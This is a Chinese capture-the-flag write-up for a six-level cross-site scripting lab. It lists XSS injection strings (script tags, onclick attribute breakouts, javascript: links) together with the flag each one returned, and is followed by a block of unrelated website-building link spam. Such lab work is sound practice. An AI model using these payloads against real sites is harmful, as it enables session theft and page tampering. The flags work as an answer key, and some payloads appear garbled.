当前位置: 首页 > news >正文

南宁市做公司网站满亦工作室 网站建设

南宁市做公司网站,满亦工作室 网站建设,做网站怎么推广收益大,潍坊网站制作多少钱B-4:跨站脚本攻击 任务环境说明: √ 服务器场景:Server2125(关闭链接) √ 服务器场景操作系统:未知 √ 用户名:未知 密码:未知 1.访问服务器网站目录1,根据页面信息完成条件&am…

B-4:跨站脚本攻击

任务环境说明:

√ 服务器场景:Server2125(关闭链接)

√ 服务器场景操作系统:未知

√ 用户名:未知 密码:未知

1.访问服务器网站目录1,根据页面信息完成条件,将获取到弹框信息作为flag提交;
 

通过尝试知道这里存在xss漏洞

?name=<script>alert(1)</script>

flag{luKOh/C9obMtoJUtHD37Zg}

2.访问服务器网站目录2,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><script>alert(1)</script>

flag{199bZN8Rge8dYtZGoTqoYA}

3.访问服务器网站目录3,根据页面信息完成条件,将获取到弹框信息作为flag提交;

通过两段代码的不同我们可以知道’在里面的重要性

‘οnclick=’javascript:alert(1)

flag{wO+8fB5yu3KCdNq5V7Uo5g}

4. 访问服务器网站目录4,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“οnclick=’javascript:alert(1)’

flag{0XRMADSrrZh7Ptv1VS9/zw}

5. 访问服务器网站目录5,根据页面信息完成条件,将获取到弹框信息作为flag提交;

“><a href=javascript(1)>

flag{Si3Czm1JYclcYp4KklGM3A}

6.访问服务器网站目录6,根据页面信息完成条件,将获取到弹框信息作为flag提交;

"><a Href=javascript(1)>

flag{Mki8dUfOl7Khl7KgbPcoPQ}

 

http://www.yayakq.cn/news/108757/

相关文章:

  • 自己的网站怎么赚钱wordpress怎样添加会员
  • 公司网站 自己是空间服务商 cms避免视觉效果混淆对吗
  • 峰峰网站建设wordpress全站启用ssl
  • 做电影网站赚钱知乎国内ui设计培训
  • 东莞网站优化费用网站制作技术支持
  • 私人免费网站怎么下载广东网站营销seo费用
  • 江都建设银行网站网站设计任务书
  • py网站开发做侦探网站
  • 杭州哪家做网站好wordpress.org配置
  • 网站整体建设方案提升网站建设品质公司
  • 免费网页加速器企业站seo案例分析
  • 建设网站需要的安全设备外国人做网站
  • 建大网站江苏盐城网站开发
  • 下列关于网站开发中网页徐州亿网
  • 宜兴建设局网站网站建设业务员沟通需求
  • 企业网站建设方案.doc企业型网站建设
  • 百度站长平台网页版佛山找人做网站
  • 什么是a站搜索引擎优化的简称是
  • 怎么在互联网做网站济南百度整站seo推广
  • 昆明网站建设优化站长之家seo信息
  • 盐城做网站哪家最好电子制作网站
  • 网站上内容列表怎么做阿里云怎么上传网站
  • 做网站多少钱zwnet免费毕业设计网站建设
  • 如何开一个网站北京各大公司名称
  • 瑞安机械网站建设自贡建设机械网站
  • 江苏做网站怎么收费wordpress加水
  • 网站建设 验收意见网页设计实训报告的目的
  • 设计网站logo商城网站微信支付接口申请
  • 制作销售网站有哪些外贸建站网站建设
  • 青海报社网站建设公司产品设计大师作品